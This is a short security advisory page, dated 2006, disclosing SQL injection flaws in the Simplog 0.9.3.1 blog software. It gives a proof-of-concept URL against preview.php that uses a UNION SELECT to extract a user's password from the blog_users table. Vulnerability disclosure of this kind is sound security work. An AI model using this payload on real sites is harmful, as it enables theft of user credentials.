Computer Security

Security Advisory: SQL Injection simplog
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [KAPDA::#60] Mambo V4.6.x vulnerabilities

  PHP Poll Creator 1.04 (poll_vote.
php)File Include

  Advisory for Oneorzero helpdesk

  PHPLibrary-1.5.
3(Description.
php) Remote File Include

From:navairum_(at)_gmail.com <navairum_(at)_gmail.com>
Date:21.10.2006
Subject:SQL Injection simplog

Softare: Simplog www.simplog.org
version:0.9.3.1 (i assume others as well)

There are a few sql injections available with this software. This one is in preview.php

eg.

http://site/preview.php?blogid=2&adm=tem&tid=-
1%20union%20select%20passw
ord%20from%20blog_users%20where%20name='[insert username here]'

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server